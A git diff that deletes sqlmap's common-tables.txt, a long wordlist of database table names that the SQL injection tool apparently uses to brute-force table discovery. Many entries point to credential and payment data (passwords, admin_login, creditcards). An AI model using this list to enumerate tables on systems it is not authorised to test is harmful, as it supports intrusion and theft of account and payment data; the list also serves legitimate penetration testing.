-deleted_at
-created_on
-modified_on
-timestamp
-is_active
-is_deleted
-is_published
-status
-enabled
-user_id
-product_id
-category_id
-order_id
-customer_id
diff --git a/data/txt/common-tables.txt b/data/txt/common-tables.txt
deleted file mode 100644
index 0f2baa69b83..00000000000
--- a/data/txt/common-tables.txt
+++ /dev/null
@@ -1,3763 +0,0 @@
-# Copyright (c) 2006-2025 sqlmap developers (https://sqlmap.org)
-# See the file 'LICENSE' for copying permission
-
-users
-customer
-user
-orders
-employee
-x_world
-category
-project
-account
-customers
-country
-config
-groups
-inventory
-department
-categories
-messages
-person
-comments
-sessions
-student
-items
-employees
-language
-accounts
-product
-CUSTOMER
-faculty
-location
-item
-authors
-parts
-members
-countries
-status
-menu
-dependent
-modules
-role
-products
-page
-chart
-task
-posts
-DEPT
-Person
-user_role
-ORDERS
-emp
-album
-EMP
-log
-INVENTORY
-payments
-part
-permission
-contact
-borrower
-report
-color
-admin
-SALGRADE
-PRODUCT
-vendor
-tax
-branch
-projects
-data
-course
-jobs
-watchlist
-shipment_line
-CATEGORY
-categoryNames
-attributeCategory
-db
-PS_DMK
-study
-event
-invoice
-order_source
-topics
-students
-order_line
-regions
-CPG_config
-news
-dept
-permissions
-events
-shipment
-sections
-ITEM
-hosts
-form_definition_version
-alias
-people
-role_permission
-applications
-CPG_usergroups
-image
-organization
-courses
-loan
-form_definition
-configuration
-hibernate_unique_key
-order
-form_error
-payment
-Author
-history
-task_param
-movies
-dept_locations
-track
-services
-EMPLOYEE
-works_on
-patient
-Student
-form_data
-setting
-PUBLISHER
-partsgroup
-languages
-depositor
-CPG_categories
-book
-Orders
-job_history
-metadata
-exchangerate
-shipto
-rcpt
-team
-address
-tasks
-queue_info
-subscribers
-city
-field_options
-locations
-statename
-BOOK
-zuseserver
-ap
-ar
-Employees
-USER
-userInfo
-telephone
-session
-User
-video
-LOCATION
-tf_links
-ACCOUNT
-artist
-property
-the
-request
-acc_trans
-lending
-postaladdress
-Customers
-xmldocument
-jiveID
-domain
-promotion
-CPG_filetypes
-assembly
-business
-orderitems
-locale
-gl
-links
-located
-identities
-sizes
-companies
-payload
-Organization
-protocol
-transfers
-encompasses
-borders
-profiles
-salesorder
-mailbox
-contacts
-tables_priv
-admin_logs
-text
-phpbb_config
-plugin
-stores
-host
-Book
-gifi
-user_groups
-term
-internetaddress
-tf_settings
-region
-poll
-makemodel
-partstax
-catalog
-question
-vendors
-departments
-notes
-delivery_quality
-queries
-identification
-friends
-vcd_Screenshots
-PERSON
-course_section
-vcd_PornCategories
-pma_history
-jiveRemoteServerConf
-channels
-object
-chip_layout
-osc_products_options_values_to_products_options
-login
-user_newtalk
-vcd_MetaDataTypes
-entrants
-Device
-imageInfo
-developers
-div_experiment
-items_template
-defaults
-osc_products
-vcd_MetaData
-mucRoomProp
-QRTZ_JOB_DETAILS
-settings
-pma_bookmark
-DEPENDENT
-imageCategoryList
-islandIn
-mobile_menu_text
-jiveUserProp
-osc_products_options_values
-wp_posts
-package
-mucRoom
-vendortax
-vcd_Comments
-attrs
-config_seq
-company
-register
-checksum_results
-ENROLLMENT
-operation
-primarytest
-vcd_CoverTypes
-binaries
-COURSE_SECTION
-Students
-func
-enrollment
-pma_table_coords
-readers
-action_element
-vcd_VcdToPornstars
-osc_categories_description
-friend_statuses
-Domain
-servers
-UserFields
-revision
-meals
-resources
-mixins
-sys_options_cats
-licenses
-pma_relation
-SIGNON
-clients
-Apply
-vcd_CoversAllowedOnMediatypes
-ThumbnailKeyword
-form_definition_text
-vcd_Log
-system
-jiveOffline
-tickers
-BANNERDATA
-mucAffiliation
-fk_test_has_pk
-rooms
-objectcache
-collection_item_count
-div_stock_parent
-jiveRoster
-Volume
-lookup
-investigator
-math
-jivePrivate
-vcd_UserWishList
-osc_manufacturers_info
-primarytest2
-PROFILE
-categories_posts
-Flight
-Gallery
-scripts
-AUTHOR
-physician
-client
-cv_country_synonyms
-osc_categories
-interwiki
-logtest
-archive
-members_networks
-vcd_MovieCategories
-language_text
-UserType
-friend
-div_annotation_type
-osc_products_description
-osc_products_to_categories
-QRTZ_PAUSED_TRIGGER_GRPS
-article
-recentchanges
-vcd_UserLoans
-media
-vcd_SourceSites
-conducts
-sales
-CurrentUsers
-Country
-vcd_IMDB
-vcd_Borrowers
-querycache
-Publication
-Pilot
-div_stock
-Regions
-DEPT_LOCATIONS
-vcd_Users
-master_table
-vcd_VcdToUsers
-funny_jokes
-jos_vm_payment_method
-vcd_UserProperties
-osc_products_images
-specialty
-pma_pdf_pages
-visits
-div_allele_assay
-vcd_MediaTypes
-ipblocks
-WidgetPrices
-form_definition_version_text
-experiment
-Publisher
-control
-protocol_action
-jivePrivacyList
-vcd_VcdToPornStudios
-subImageInfo
-plugin_sid
-message_statuses
-state
-GalleryThumb
-hitcounter
-vcd_Pornstars
-QRTZ_BLOB_TRIGGERS
-div_generation
-jiveGroupProp
-ingredients
-community_item_count
-jiveExtComponentConf
-SEQUENCE
-Continent
-rights
-div_statistic_type
-Path
-osc_manufacturers
-logging
-colnametests
-QRTZ_FIRED_TRIGGERS
-div_locality
-sailors
-Description
-warehouse
-DEPARTMENT
-legacy_things
-jiveVCard
-agent
-CPG_bridge
-CUSTOMERS
-jiveProperty
-app_user
-keyboards
-div_unit_of_measure
-categorylinks
-grants
-Action
-div_trait
-div_trait_uom
-WidgetReferences
-product_type
-developers_projects
-userAttribute
-vcd_Sessions
-form_data_archive
-vcd_PornStudios
-action_attribute
-Thumbnail
-jiveGroupUser
-computers
-QRTZ_LOCKS
-vcd_PropertiesToUser
-customertax
-sector
-networks
-columns_priv
-globals
-div_obs_unit_sample
-Widgets
-TERM
-salgrade
-div_passport
-vcd_UserRoles
-mucMember
-imagelinks
-exchange
-Status
-WORKS_ON
-lines
-testusers
-booleantests
-QRTZ_SIMPLE_TRIGGERS
-mobile_menu
-staff
-vcd_VcdToPornCategories
-tblusers
-hashes
-partner
-Product
-personnel
-ads
-vcd_Covers
-osc_specials
-Keyword
-supplier
-agent_specialty
-pokes
-profile_pictures
-oldimage
-div_poly_type
-osc_products_attributes_download
-div_allele
-isMember
-vcd_Images
-userImageRating
-detail_table
-osc_products_attributes
-pma_table_info
-officer
-div_obs_unit
-vcd_Settings
-COURSE
-Time
-locatedOn
-medicalprocedure
-fk_test_has_fk
-mergesWith
-author
-UserFieldsInfo
-Employee
-oe
-QRTZ_TRIGGERS
-insurance
-SUPPLIER
-div_aa_annotation
-song
-imageAttribute
-views_track
-extremes
-vcd_VcdToSources
-jiveRosterGroups
-webcal_config
-phpbb_ranks
-triggers_template
-appVersions
-vcd_RssFeeds
-DUMMY
-ROLE
-activity
-study_text
-osc_products_options
-City
-QRTZ_SCHEDULER_STATE
-osc_reviews
-edge
-questions
-partof
-blobs
-QRTZ_CRON_TRIGGERS
-tag
-userSession
-vcd
-pma_column_info
-auto_id_tests
-job
-site_stats
-mucConversationLog
-sequence
-madewith
-OperationStatus
-SPJ
-turizmi_ge
-zutat_cocktail
-DWE_Internal_WF_Attributes
-zipcodes
-insertids
-ChemList
-product_category
-foreigntest2
-hero
-cmContentVersionDigitalAsset
-reports
-devel_logsql
-f_sequence
-MEMBER
-ClassificationScheme
-ez_webstats_conf
-credential
-utilise
-cmDigitalAsset
-ACL_table
-service_request_log
-feedback
-vars
-tblblogentriescategories
-assignment
-CUST_HIST
-ew_menu
-time_zone_transition_type
-child_configs
-LIBRARY_BRANCH
-Company
-Component
-webcal_entry_log
-transactions
-webcal_entry_ext_user
-dept_location
-ConsultantsTable
-phonelist
-sys_acl_actions
-participate
-population
-dtb_order
-files_config
-PropColumnMap
-result
-pma_designer_coords
-triggers
-audittrail
-f_attributedependencies
-organization_type_package_map
-DWE_Corr_Sets
-userlist
-backgroundJob_table
-sf_guard_user_permission
-my_lake
-DWE_Corr_Tokens
-sampleData
-qrtz_blob_triggers
-reciprocal_partnersites
-rss_categories
-ADMIN
-site_map_ge
-Factory_Output
-geo_Estuary
-phpbb_themes
-forum
-ClientsTable
-mushroom_trainset
-rating_track
-iplinks
-maxcodevento
-reciprocal_admin
-ew_moduli
-CheckType
-cmLanguage
-phpbb_points_config
-guava_sysmodules
-querycachetwo
-soc_da_polit_ge
-BOOK_AUTHORS
-records
-reciprocal_config
-newsletter_queue
-passwds
-phpbb_posts_text
-biosample
-connectorassocs
-BOOK_COPIES
-jos_sections
-vote
-SCRIPT
-THOT_CATEGORY
-artifact
-object_types
-pages
-usuario
-CE_table
-phpbb_forums
-tbl_country
-Products
-dtb_bat_order_daily
-site_wtype
-geo_mountain
-expression
-Simple_Response
-photoo
-photos
-child_config_traffic_selector
-version_data
-allocation
-dtb_category_total_count
-habilidad
-PREFIX_group_lang
-work_orders
-SELLER
-cv_soil
-taxon
-bkp_ItemResource
-ezcontentobject_trash
-webcal_view
-pagecontent
-Collection
-maxcodcurso
-self_government_ge
-phpbb_user_group
-InstanceStringTable
-bldg_types
-t1
-mailaddresses
-section
-m_type
-configlist
-cmRepositoryContentTypeDefinition
-trade
-Parameter
-jforum_privmsgs
-tbl_works_categories
-help_category
-bkp_String
-Class_Display_Sequence
-EPIXEIRISI
-sounds
-phpbb_groups
-dtb_campaign
-produit
-adblocks
-vendor_seq
-guava_theme_modules
-dtb_pagelayout
-bookings
-cmPublicationDetail
-writes
-writer
-distance
-DWE_Resource_Attributes
-jforum_groups
-Polynomial
-river
-GROUP
-sea
-IDIOTIS
-cmPublication
-last
-UsageParameter
-phpbb_topics
-t_peep
-PREFIX_group
-dtb_delivfee
-equipment_type_seq
-wp_users
-news_category
-SchemaInfo
-WidgetDescriptions
-dtb_category_count
-sidebar
-R1Weights
-humanitaruli_ge
-cmTransactionHistory
-facets
-jforum_roles
-samedicino_ge
-qrtz_job_listeners
-geo_Lake
-religion
-nuke_gallery_media_class
-cia
-DatabaseInfo
-R2TF
-THOT_THEME
-R1Length
-cmContentRelation
-S2ODTMAP
-enrolled
-liste_domaines
-DEMO_PROJECTS
-ORDERSTATUS
-site_iwis
-MountainOnIsland
-bkp_ItemReference
-Category
-Mountain
-INSTITUTE
-POINT
-forum_vote
-THOT_TYPE
-cmts_track
-bkp_ItemReplication
-hostbenchmarks
-filearchive
-f_spatialcontext
-UM_ROLE_ATTRIBUTES
-SCALE
-maclinks
-books
-DWE_Predecessors
-interactions
-graphs_items
-stars
-BID
-enrolls
-site_environment
-user_types
-Severity
-partscustomer
-wp_pod_types
-River
-marital_status
-PZ
-PN
-email
-CustomerCards
-mtb_zip
-Campus
-R1Size
-hardware
-dtb_other_deliv
-pricegroup
-commissionEmployees
-cv_pests_diseases
-tbl_tech
-macswitches
-cc_config
-audit
-colour
-command
-audio
-egresado
-aggtest
-transport
-zusti_da_sabuneb_ge
-div_scoring_tech_type
-R2Weights
-schedule
-routers
-zips
-DWE_Delay_Timers
-Descriptions
-software
-wh_der_children
-delivery
-placex
-cv_crops
-problem
-Station_Data
-account_transaction
-time_zone_name
-numedia
-THOT_DEEP
-ZENTRACK_VARFIELD_IDX
-roads_endpoints
-Propdesc_table
-general_log
-peer_configs
-hot_prop
-phones
-ServiceBinding
-emailinfo
-dtb_member
-cmSiteNode
-nodes
-sbreciprocal_cats
-rss_read
-DWE_Workflow_Documents
-bombing
-tblblogtrackbacks
-fragment
-dtb_review
-tblblogsearchstats
-datasources
-CPG_users
-vrls_partners
-guava_roles
-webcal_user_layers
-ANSWER_GROUP_DETAIL
-tbl_clients
-dtb_kiyaku
-EmailAddress
-Sea
-powers
-QRTZ_CALENDARS
-reserve
-LINEITEM
-project_user_xref
-Agent
-idioma
-dtb_campaign_detail
-jos_components
-user_rights
-tf_messages
-Class_Def_Table
-geo_lake
-copytest
-tissue
-ligneDeFacture
-PZ_Data
-tf_cookies
-archtypes
-cmts
-photo
-dtb_bloc
-user_preferences
-music_ge
-D_Abbreviation
-data_set_association
-site_location
-jforum_posts
-Property
-pg_ts_dict
-badspy
-gearing
-credenziali
-abstract
-evidence
-files
-test
-intUsers
-div_treatment
-tblblogentries
-cocktail_person
-cdv_curated_allele
-REORDER
-Religion
-turns
-MetadataValue
-curso
-redirect
-accountuser
-qrtz_cron_triggers
-StateType
-forum_user_stat
-Descriptions_Languages
-m_users_profile
-Booked_On
-not_null_with_default_test
-tblblogroles
-organizations
-topic
-economy
-DWE_Org_Resources
-Model
-maxcodcorreo
-RATING
-Transactions
-Chemicals
-m_data
-USER_GROUP
-equipment_type
-geo_Island
-sysmaps
-ezin_roles
-phpbb_themes_name
-dtb_send_history
-dtb_send_customer
-cart
-size
-pg_ts_cfgmap
-LimitTest2
-QUESTION
-DC_Data
-webcal_group_user
-telefono
-builds
-tbluserroles
-webcal_site_extras
-solde
-document
-m_users_acct
-vendor_types
-fruit
-DWE_Resources
-Service
-PART
-cell_line
-dtb_bat_order_daily_age
-images
-apartments
-THOT_ALPHA
-ippaths
-area
-SYNALLAGI
-sysmaps_hosts
-tbl_works
-statuses
-webcal_user
-customurl
-THOT_YEAR
-DWE_Subscriptions
-correo
-kultura_ge
-Factory_Master
-inv_lines_seq
-certificates
-webcal_asst
-ostypes
-POINT_SET
-R2IDF
-forum_flag
-bugs
-taxonomy
-UM_ROLES
-div_synonym
-payer
-tf_log
-job_title
-ask
-wp_options
-forum_user_activity
-trackbacks
-wp_pod_fields
-cmAvailableServiceBindingSiteNodeTypeDefinition
-translation
-cdv_passport_group
-User_
-Users
-access_control
-my_county
-zoph_people
-account_permissions
-ORDERLINES
-ganatlebe_ge
-wp_term_relationships
-pictures
-product_font
-Departure
-mushroom_test_results
-routerbenchmarks
-bkp_Item
-Channel_Data
-realtable
-mushroom_NBC_class
-odetails
-user_type_link
-eco_da_biz_ge
-belong
-ezin_users
-time_zone_transition
-ew_tabelle
-ezsearch_return_count_new
-cmSystemUserRole
-m_users
-div_accession_collecting
-Economy
-tbl_works_clients
-qrtz_locks
-geo_Mountain
-dtb_category
-tmp
-reservation
-geo_Desert
-dtb_payment
-forum_topic
-ezsearch_search_phrase_new
-jforum_attach
-sazog_urtiertoba_ge
-Equipment
-iuridiuli_ge
-MetadataSchemaRegistry
-basePlusCommissionEmployees
-addresses
-phpbb_search_wordlist
-user_defined_attribute
-fournisseurType
-dpt_trans
-PostalAddress
-defaultinsertid
-Politics
-pools
-cocktail_lokal
-dtb_blocposition
-templatelinks
-jforum_ranks
-D_Format_Data
-tblblogtextblocks
-time_zone_leap_second
-rss
-Decimation
-dtb_user_regist
-f_options
-siteIndexTable
-Administrator
-phpbb_users
-ezin_authors
-SpecificationLink
-videos
-sf_guard_remember_key
-employer
-monitoringi_ge
-leases
-phpbb_smilies
-stats
-f_spatialcontextgroup
-experiencia
-dtb_csv
-line_items_seq
-ndb_binlog_index
-zoph_categories
-help_topic
-div_treatment_uom
-transaction
-wp_links
-DWE_Organizations
-live_ge
-cdv_allele_curated_allele
-timeperiod
-item_master_seq
-GLI_profiles
-cv_countries
-qrtz_scheduler_state
-journal
-tf_users
-mwuser
-stories
-dtb_table_comment
-jforum_quota_limit
-Lake
-SQLDATES
-phpbb_search_wordmatch
-friend2
-functions
-comboboxes
-DWE_Max_Id
-std_item
-foreigntest
-jiveVersion
-sf_guard_group
-Classification
-Sensitivity
-PREFIX_category_group
-preferences
-credit
-geo_sea
-type
-knjiga
-FindCriteria
-zoph_prefs
-webcal_entry_repeats
-room
-domain_info
-SALES
-DWE_Tasks
-profession1
-SUPPORT_INCIDENTS
-PERMISSION
-Defect
-DWE_Task_Attributes
-grandchild_test
-Desert
-KARTA
-UM_ROLE_PERMISSIONS
-Purchases
-PREFIX_configuration
-guava_themes
-alltypes
-webcal_view_user
-vrls_xref_country
-R1TF
-subject
-continent
-D_Format
-dtb_recommend_products
-Linkdesc_table
-qrtz_fired_triggers
-TelephoneNumber
-dtb_customer_mail_temp
-copyrights
-jforum_extension_groups
-DEMO_ASSIGNMENTS
-guava_group_assignments
-jforum_extensions
-zutat
-ew_user
-duptest
-alerts
-partsvendor
-jiveGroup
-organization_seq
-dtb_customer_reading
-configuratore
-tbl_event
-my_street
-osvendors
-softwares
-Session
-admins
-TIL_IDIOTON
-EthnicGroup
-reviews
-tblblogentriesrelated
-guava_packages
-GRouteDetail
-cdv_reason
-nulltest
-membership
-bkp_RS_Servers
-vrls_listing_images
-schema_info
-entity
-group
-ClassificationNode
-dtb_best_products
-cv_cropping_system
-DWE_Workflows
-egresadoxidiomaxhabilidad
-locus_data
-dtb_order_temp
-tblblogsubscribers
-account_log
-facture
-MetadataFieldRegistry
-BRANCH
-orgs
-DM
-NextID_table
-webcal_group
-DC
-wp_pod_widgets
-chromosomes
-Name
-roster
-dtb_csv_sql
-synchro_type
-langlinks
-genres_in_movies
-qrtz_triggers
-Province
-answerOption
-wp_postmeta
-ERDESIGNER_VERSION_ID
-calendar
-cmEvent
-ruletest
-forum_user
-SalesReps
-ew_gruppi
-vrls_xref_state_province
-conferences
-pay
-Plane
-webcal_entry_repeats_not
-Island
-tbl_works_tech
-webcal_import
-nuke_gallery_comments
-monthlabel
-tblblogcomments
-dtb_delivtime
-product_size_multi
-manufacturer
-Tasks
-island
-coupon
-webcal_report
-RegistryPackage
-sysmaps_links
-procs_priv
-invoices_seq
-film
-genres
-field
-vertex
-FoundThumbs
-qrtz_trigger_listeners
-reciprocal_links
-DWE_Meta_Data
-Course
-idiomaxegresado
-ordreReparation
-Assigned_To
-ORDERITEMS
-PREFIX_product_attribute_image
-COLLECT_SITE
-THOT_CONCEPT
-publisher
-dtb_mailmaga_template
-DSObject_table
-forum_post
-sf_guard_permission
-Prefixes
-dtb_update
-BROWSE
-tf_rss
-TIME
-reciprocal_mails
-association
-typeFacture
-StringTable
-CATEGORIES
-Language
-mountain
-ad_locales
-ExtrinsicObject
-R2Size
-geo_island
-derived_types
-snipe_gallery_cat
-qrtz_job_details
-guava_roleviews
-production_wtype
-AccountXML1
-wh_man_children
-not_null_test
-product_colour_multi
-ike_configs
-intUseringroup
-study_user
-pg_ts_cfg
-connectorswitches
-procedure_biosample
-theday
-fournisseur
-typeProduit
-BOOKAUTHOR
-passwords
-keys
-AuditableEvent
-ExternalIdentifier
-source
-BOOK_LOANS
-UserRole
-vrls_xref_listing_offer_type
-cmRole
-PREFIX_search_engine
-my_poi
-Channel_Comment
-forum_cat
-invite
-PREFIX_order_return_state
-experimental_data_set
-DOCUMENT_FIELDS
-Scripts
-mushroom_dataset
-desert
-Can_Fly
-synchro_element
-maxcodtelefono
-enrollments
-tblblogpages
-f_attributedefinition
-intGroups
-way_nodes
-child_test
-THOT_TARGET
-MOMENT
-dtb_classcategory
-product_price
-relation_members
-PREFIX_access
-dtb_deliv
-webcal_categories
-Parts
-invoices
-QRTZ_JOB_LISTENERS
-ANSWER
-tbl_categories
-yearend
-DEPARTMENTS
-account_level
-ref
-help_relation
-zoph_users
-procedure_data_set
-Association
-mtb_pref
-ANSWER_GROUP
-GDirectedRoute
-graphs
-occasion
-account_temp
-nuke_gallery_categories
-areas
-cmContentVersion
-checksum_history
-mushroom_test_results_agg
-accessTable
-cameFromTable
-services_links
-Coefficients
-reglement
-maxcodexperiencia
-vrls_xref_listing_type
-adv
-lake
-tests
-Offices
-qrtz_simple_triggers
-Editor
-sazog_urtiertoba_ge2
-wp_pod_pages
-Extlangs
-seq_gen
-rss_subscription
-Station_Comment
-R1IDF
-jforum_config
-cmServiceDefinitionAvailableServiceBinding
-geo_River
-facilities
-connectorlinks
-file_storage
-neuf
-school
-wp_term_taxonomy
-m_plans
-ligneDeCommande
-FORM_QUESTION
-history_str
-f_classtype
-endpoints
-R2Length
-zoph_albums
-bkp_ItemPresentation
-tblblogcategories
-div_taxonomy
-traffic_selectors
-FORM
-qrtz_paused_trigger_grps
-creditcards
-people_reg
-country_partner
-jforum_users
-array_test
-dtb_mail_history
-priorities
-relations
-combustiblebois
-slow_log
-DWE_Resource_Roles
-WROTE
-flow
-pay_melodies
-dtb_templates
-variable_interest
-dtb_class
-ZENTRACK_VARFIELD
-catalogue
-uplebata_dacva_ge
-wp_usermeta
-time_zone
-games
-wp_terms
-sf_guard_user_group
-honorsinfo
-maxcodestudio
-estudio_academico
-RECORD
-Room
-alarms
-ew_temi
-clubs
-net_pm
-tbl_state
-cmContentTypeDefinition
-radacct
-peer_config_child_config
-cmAvailableServiceBinding
-cmSiteNodeVersion
-Poles_Zeros
-ipmacassocs
-m_news
-dtb_news
-shared_secrets
-UsageDescription
-rol
-phpbb_posts
-ipassocs
-cmSystemUser
-phpbb_categories
-FoundLists
-jforum_smilies
-channelitems
-lokal
-subcategory
-Languages
-jiveSASLAuthorized
-DWE_WF_Attributes
-cocktail
-cust_order
-mushroom_testset
-THOT_SOURCE
-product_font_multi
-presence
-UM_USERS
-jiveUser
-cmSiteNodeTypeDefinition
-wp_comments
-dtb_bat_order_daily_hour
-jos_vm_category
-CONTACT
-SpecialityTable
-librarian
-geo_river
-MonitorStatus
-pagelinks
-ways
-DWE_Roles
-jforum_vote_desc
-cities
-PREFIX_order_return_state_lang
-subscriber
-prereq
-Slot
-rss_item
-UM_USER_ROLES
-PREFIX_timezone
-evento
-guava_views
-cmServiceDefinition
-Variants
-searchindex
-actions
-cdv_passport_set
-production_multiple
-page_log_exclusion
-furniture
-nuke_gallery_pictures
-cmRepositoryLanguage
-oc
-os
-PREFIX_tab_lang
-lc_fields
-framework_email
-datasets
-sporti_ge
-externallinks
-geo_desert
-politics
-hourlyEmployees
-D_Comment
-EMPLOYEES
-individual
-m_with
-program
-combustible
-ezin_articles
-pma_tracking
-help_keyword
-POSITION
-stars_in_movies
-glas
-cmRepository
-dtb_mailtemplate
-DIM_TYPE
-cart_table
-D_Unit
-array_probe
-macassocs
-changeTva
-UM_PERMISSIONS
-geo_Source
-R1Sum
-cdv_marker
-nuke_gallery_template_types
-UM_USER_ATTRIBUTES
-Aircraft
-store
-Descriptions_Variants
-trigger_depends
-guava_role_assignments
-ExternalLink
-bkp_RS_Clusters
-PN_Data
-users_sessions
-webcal_nonuser_cals
-parent_test
-cmServiceBinding
-BUYER
-transcache
-dtb_question_result
-rss_category
-profiling
-QRTZ_TRIGGER_LISTENERS
-THOT_LANGUAGE
-cmContent
-Descriptions_Scripts
-DSProp_table
-webcal_report_template
-service_request
-resource_types
-THOT_SUB_MENU
-bkp_ResourceFolder
-PREFIX_tab
-province
-dtb_bat_relate_products
-changePrix
-proc
-ewst_sessioni
-nuke_gallery_media_types
-outdoor_spaces
-po_seq
-salariedEmployees
-grp
-jforum_topics
-defertest
-array_data
-most_recent_checksum
-m_earnings
-product_related
-dtb_baseinfo
-webcal_import_data
-federationApplicants
-qrtz_calendars
-melodies
-jforum_forums
-sf_guard_group_permission
-sys_acl_matrix
-R2ODTMAP
-mushroom_NBC
-country_diseases
-dtb_order_detail
-sic
-PROJECT
-log_fake_referers
-ROLE_PERM
-isDeleted_table
-vrls_listings
-Table
-sf_guard_user
-Subject
-cdv_curation
-dictionary
-forum_report
-institution
-cmQualifyer
-jforum_categories
-site_climatic
-phpbb_points_values
-zoph_color_schemes
-DWE_Internal_Task_Attributes
-uniquetest
-TypeRule
-dtb_customer
-R2Sum
-PREFIX_customer_group
-ProjectsTable
-dtb_products
-words
-dtb_question
-UM_USER_PERMISSIONS
-exam
-commande
-viktorina_ge
-dtb_products_class
-subscribe
-page_restrictions
-querycache_info
-cdv_map_feature
-oidtest
-Link_table
-guava_users
-connectormacassocs
-moduleexecs
-guava_groups
-Institution
-sconfig
-shared_secret_identity
-platforms
-BORROWER
-phpbb_acl_options
-markers
-Population
-shipping
-guava_preferences
-rating
-UserCapability
-Priority
-rec_jobs
-ezin_sections
-Descriptions_Regions
-SPACE
-geo_Sea
-DATA_ORG
-Contributor
-flag
-
-# Various Joomla tables
-
-jos_vm_product_download
-jos_vm_coupons
-jos_vm_product_reviews
-jos_core_acl_aro
-jos_vm_shopper_vendor_xref
-jos_stats_agents
-jos_vm_orders
-jos_poll_menu
-jos_content_rating
-jos_vm_vendor
-jos_vm_product_mf_xref
-jos_vm_export
-jos_polls
-jos_content_frontpage
-jos_vm_userfield_values
-jos_categories
-jos_poll_data
-jos_vm_manufacturer
-jos_vm_order_user_info
-jos_core_acl_groups_aro_map
-jos_messages
-jos_vm_zone_shipping
-jos_bannertrack
-jos_vm_order_status
-jos_modules_menu
-jos_vm_product_type
-jos_vm_product_type_parameter
-jos_vm_tax_rate
-jos_core_log_items
-jos_modules
-jos_users
-jos_vm_product_category_xref
-jos_vm_product_attribute
-jos_poll_date
-jos_vm_vendor_category
-jos_vm_state
-jos_vm_country
-jos_weblinks
-jos_vm_cart
-jos_vm_shipping_label
-jos_vm_manufacturer_category
-jos_vm_shopper_group
-jos_vm_product_votes
-jos_vm_currency
-jos_vm_creditcard
-jos_menu
-jos_groups
-jos_messages_cfg
-jos_vm_order_payment
-jos_content
-jos_bannerclient
-jos_vm_product_discount
-jos_core_log_searches
-jos_vm_auth_user_group
-jos_contact_details
-jos_vm_auth_group
-jos_vm_waiting_list
-jos_vm_category_xref
-jos_newsfeeds
-jos_vm_auth_user_vendor
-jos_vm_user_info
-jos_vm_function
-jos_vm_product_files
-jos_vm_userfield
-jos_vm_shipping_carrier
-jos_core_acl_aro_map
-jos_vm_shipping_rate
-jos_vm_product
-jos_vm_product_product_type_xref
-jos_core_acl_aro_groups
-jos_templates_menu
-jos_menu_types
-jos_plugins
-jos_session
-jos_vm_order_item
-jos_vm_module
-jos_vm_product_attribute_sku
-jos_vm_product_price
-jos_vm_csv
-jos_migration_backlinks
-jos_vm_product_relations
-jos_core_acl_aro_sections
-jos_vm_order_history
-jos_banner
-php_users
-ALL_USERS
-banned_users
-users_tmp
-users_club
-publicusers
-cmsusers
-
-# List provided by Anastasios Monachos (anastasiosm@gmail.com)
-
-blacklist
-cost
-moves
-pelates
-tamio
-tameio
-xristes
-zones
-tamio_pelates
-kwdikos
-addressbookgrp
-sendmsgs
-publicationauthor
-publicationfile
-topicpublication
-userrights
-comp_group
-computers_ID
-event_log
-networking
-routing
-software_licenses
-ips
-arxeia
-SMS_TABLE
-TABLE_PRIVILEGE_MAP
-AMUSER
-CONTACTTYPE
-CONTENT
-DOWNLOADGROUP
-DOWNLOADS
-DOWNLOADTYPE
-EMAIL
-ENQUIRY
-FACTSHEET
-FUND
-FUNDGROUP
-HISTORY
-MANAGEMENTGROUP
-SUBSCRIBE
-TBLUSERS
-TBLLIST
-TBLLOG
-TBLPROFILES
-TBLREPORTS
-TBLTRANSACTIONS
-TBLRETAILUSERS
-TBLCORPUSERS
-TBLCORPORATEUSERS
-
-# List from schemafuzz.py (http://www.beenuarora.com/code/schemafuzz.py)
-
-tbladmins
-sort
-_wfspro_admin
-4images_users
-a_admin
-adm
-admin_login
-admin_user
-admin_userinfo
-administer
-administrable
-administrate
-administration
-administrator
-administrators
-adminrights
-adminuser
-art
-article_admin
-articles
-artikel
-aut
-autore
-backend
-backend_users
-backenduser
-bbs
-chat_config
-chat_messages
-chat_users
-clubconfig
-content
-cpg_config
-cpg132_users
-customers_basket
-dbadmins
-dealer
-dealers
-diary
-download
-Dragon_users
-e107_user
-fusion_user_groups
-fusion_users
-ibf_admin_sessions
-ibf_conf_settings
-ibf_members
-ibf_members_converge
-ibf_sessions
-icq
-index
-info
-ipb_sessions
-joomla_users
-jos_blastchatc_users
-jos_comprofiler_members
-jos_joomblog_users
-jos_moschat_users
-knews_lostpass
-korisnik
-korisnici
-kpro_adminlogs
-kpro_user
-login_admin
-login_admins
-login_user
-login_users
-logins
-logon
-logs
-lost_pass
-lost_passwords
-lostpass
-lostpasswords
-m_admin
-main
-mambo_session
-mambo_users
-manage
-manager
-mb_users
-member
-memberlist
-minibbtable_users
-mitglieder
-movie
-mybb_users
-mysql
-name
-names
-news_lostpass
-newsletter
-nuke_authors
-nuke_bbconfig
-nuke_config
-nuke_popsettings
-nuke_users
-obb_profiles
-parol
-partners
-passes
-password
-perdorues
-perdoruesit
-phorum_session
-phorum_user
-phorum_users
-phpads_clients
-phpads_config
-forum_users
-poll_user
-punbb_users
-pwd
-pwds
-reg_user
-reg_users
-registered
-reguser
-regusers
-cards
-site_login
-site_logins
-sitelogin
-sitelogins
-sites
-smallnuke_members
-smf_members
-SS_orders
-statistics
-superuser
-sysadmin
-sysadmins
-sysuser
-sysusers
-table
-tables
-tb_admin
-tb_administrator
-tb_login
-tb_member
-tb_members
-tb_user
-tb_username
-tb_usernames
-tb_users
-tbl
-tbl_user
-tbl_users
-tbluser
-tbl_client
-tblclients
-tblclient
-usebb_members
-user_admin
-user_info
-user_list
-user_login
-user_logins
-user_names
-usercontrol
-userinfo
-userlogins
-username
-usernames
-vb_user
-vbulletin_session
-vbulletin_user
-voodoo_members
-webadmin
-webadmins
-webmaster
-webmasters
-webuser
-webusers
-x_admin
-xar_roles
-xoops_bannerclient
-xoops_users
-yabb_settings
-yabbse_settings
-ACT_INFO
-ActiveDataFeed
-CategoryGroup
-ChicksPass
-ClickTrack
-CountryCodes1
-CustomNav
-DataFeedPerformance1
-DataFeedPerformance2
-DataFeedPerformance2_incoming
-DataFeedShowtag1
-DataFeedShowtag2
-DataFeedShowtag2_incoming
-dtproperties
-Event
-Event_backup
-Event_Category
-EventRedirect
-Events_new
-Genre
-JamPass
-MyTicketek
-MyTicketekArchive
-News
-Passwords by usage count
-PerfPassword
-PerfPasswordAllSelected
-Promotion
-ProxyDataFeedPerformance
-ProxyDataFeedShowtag
-ProxyPriceInfo
-Region
-SearchOptions
-Series
-Sheldonshows
-StateList
-States
-SubCategory
-Subjects
-Survey
-SurveyAnswer
-SurveyAnswerOpen
-SurveyQuestion
-SurveyRespondent
-sysconstraints
-syssegments
-tblRestrictedPasswords
-tblRestrictedShows
-Ticket System Acc Numbers
